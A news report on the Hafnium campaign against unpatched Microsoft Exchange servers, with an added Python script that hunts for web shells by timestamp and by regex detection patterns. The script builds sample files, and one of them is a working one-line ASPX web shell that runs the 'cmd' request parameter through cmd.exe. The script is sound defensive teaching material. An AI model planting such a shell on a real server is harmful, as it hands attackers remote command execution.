An aggressive Chinese hacking group compromised some 30,000 American government and commercial organizations through a Microsoft Exchange Server vulnerability.
The Wall Street Journal reported that the number of affected organizations could reach 250,000. The hackers had access to the systems for about two months before Microsoft released a patch on March 2nd to fix the flaw.
In the three days since the patch was released, the Chinese hacking crew, Hafnium, has stepped up its attacks on any systems still running an unpatched version of Microsoft Exchange Server. In every intrusion, Hafnium left behind a tool called a ‘web shell’: a script placed on the server that can be reached over the internet and gives the attackers administrative access to the compromised system, and that remains in place even after the vulnerability itself is patched.
Cybersecurity company Volexity discovered the Exchange vulnerabilities on Jan. 6 while investigating Chinese intrusion attempts. In an interview with KrebsOnSecurity, Volexity president Steven Adair said the hackers are now trying to break into as many systems as possible before organizations apply Microsoft’s patches and close the holes.
“We’ve worked on dozens of cases so far where web shells were put on the victim system back on Feb. 28 [before Microsoft announced its patches], all the way up to today… Even if you patched the same day Microsoft published its patches, there’s still a high chance there is a web shell on your server.”
“The truth is, if you’re running Exchange and you haven’t patched this yet, there’s a very high chance that your organization is already compromised,” Adair told KrebsOnSecurity.
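Adair’s point is that patching is not the end of the job: a server patched on day one can still carry a web shell that was dropped before the patch. The practical check is to go through the server’s web root for script files that were added or changed in the attack window and that hand request input to something that executes it. The script below is an added example written for this page, not Volexity’s or Microsoft’s tooling. The attack window uses the dates the article gives (Feb. 28 through patch day, March 2); the indicator patterns are a simplifying assumption, and the three sample .aspx files are constructed so the example runs offline.

```python
"""Hunt for web shells dropped into an IIS/Exchange web root during a
known attack window (example code for this page, not vendor tooling).

Two checks are applied to every .aspx file under a directory tree:
  1. modification time inside the attack window, and
  2. contents in which a request parameter reaches an executor
     (Process.Start, eval, CreateObject, Execute).
Either check alone is noisy; a file that trips both deserves a look.
"""
import os
import re
import tempfile
from datetime import datetime, timezone

# Attack window taken from the article: web shells were seen from Feb. 28
# up to and including patch day, March 2, 2021 (end bound is exclusive).
WINDOW_START = datetime(2021, 2, 28, tzinfo=timezone.utc)
WINDOW_END = datetime(2021, 3, 3, tzinfo=timezone.utc)

# Indicator patterns: an assumption for this example. A real hunt would use
# the indicators of compromise published by the vendor and your own baseline.
INDICATORS = [
    re.compile(r'Request\s*[\[.]\s*"?\w+"?\s*\]?', re.I),          # reads attacker input
    re.compile(r'Process\.Start|eval\s*\(|CreateObject\s*\(|Execute\s*\(', re.I),  # executes it
]


def scan_webroot(root, start=WINDOW_START, end=WINDOW_END):
    """Return a sorted list of (relative path, reasons) for suspicious .aspx files."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".aspx"):
                continue
            path = os.path.join(dirpath, name)
            reasons = []
            mtime = datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)
            if start <= mtime < end:
                reasons.append("modified in attack window")
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            if all(p.search(text) for p in INDICATORS):
                reasons.append("request input reaches an executor")
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, reasons))
    return sorted(findings)


def build_sample_webroot():
    """Construct a throwaway web root with three .aspx files (sample data, not from any real server)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        # legitimate page, untouched since mid-2020: no reason to flag
        "inbox.aspx": ('<%@ Page Language="C#" CodeBehind="inbox.aspx.cs" %>\n'
                       '<html><body>Inbox</body></html>\n',
                       datetime(2020, 6, 1, tzinfo=timezone.utc)),
        # web shell: runs whatever arrives in the "cmd" parameter, dropped March 1
        "helper.aspx": ('<%@ Page Language="C#" %>\n'
                        '<% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]); %>\n',
                        datetime(2021, 3, 1, tzinfo=timezone.utc)),
        # legitimate page an admin edited on patch day: trips the time check only
        "notes.aspx": ('<%@ Page Language="C#" %>\n'
                       '<html><body>Maintenance notes</body></html>\n',
                       datetime(2021, 3, 2, 12, tzinfo=timezone.utc)),
    }
    for name, (body, when) in samples.items():
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        ts = when.timestamp()
        os.utime(path, (ts, ts))  # backdate the file to the scenario's timestamp
    return root


def demo():
    """Build the constructed web root and scan it."""
    return scan_webroot(build_sample_webroot())


if __name__ == "__main__":
    for rel_path, why in demo():
        print(f"{rel_path}: {', '.join(why)}")
```

On a real server the time check should not be trusted on its own: an attacker can reset timestamps, and an administrator’s own edits land in the window too (the notes.aspx case above). Treat the content check as the signal and the window as a way to prioritise, and compare the web root against a known-good copy or the install media rather than against this short indicator list.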
Andy Greenberg, a cybersecurity reporter at Wired, reported that a national security official familiar with the investigation into the breach described the hacking as “massive,” with thousands of servers worldwide being compromised each hour.
White House press secretary Jen Psaki said that the hack could have “far-reaching impacts” and that the government is concerned about the large number of compromised companies.
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has instructed all government departments running Microsoft Exchange servers either to disconnect them from their networks or to apply the update as soon as possible.
White House National Security Advisor Jake Sullivan tweeted that the administration is tracking the hack’s potential impact on American think tanks and the defense industrial base. He urged network owners to deploy the Microsoft patch immediately and secure their systems.
Rising Chinese and Russian cyberattacks
The communist Chinese cyberattacks come a few months after Russian hackers allegedly breached SolarWinds Corp., potentially affecting thousands of entities, including government departments. Citing the rising cyberattacks from countries like Russia and communist China, the Biden administration said it is planning a major retaliation against Russia in the coming weeks.
The New York Times reported that Washington is preparing a series of covert actions against Russian networks to send a message to Putin and his intelligence agencies. However, the Biden administration has made no such commitment to retaliate against communist China.
“We are undertaking a whole of government response to assess and address the impact… This is an active threat still developing, and we urge network operators to take it very seriously,” a White House official said in an email.
Charles Carmakal, a senior vice president at cybersecurity company FireEye Inc., said that the good guys are getting tired. Given the recent run of attacks on American companies and affiliated entities, the U.S. might also act against Chinese networks.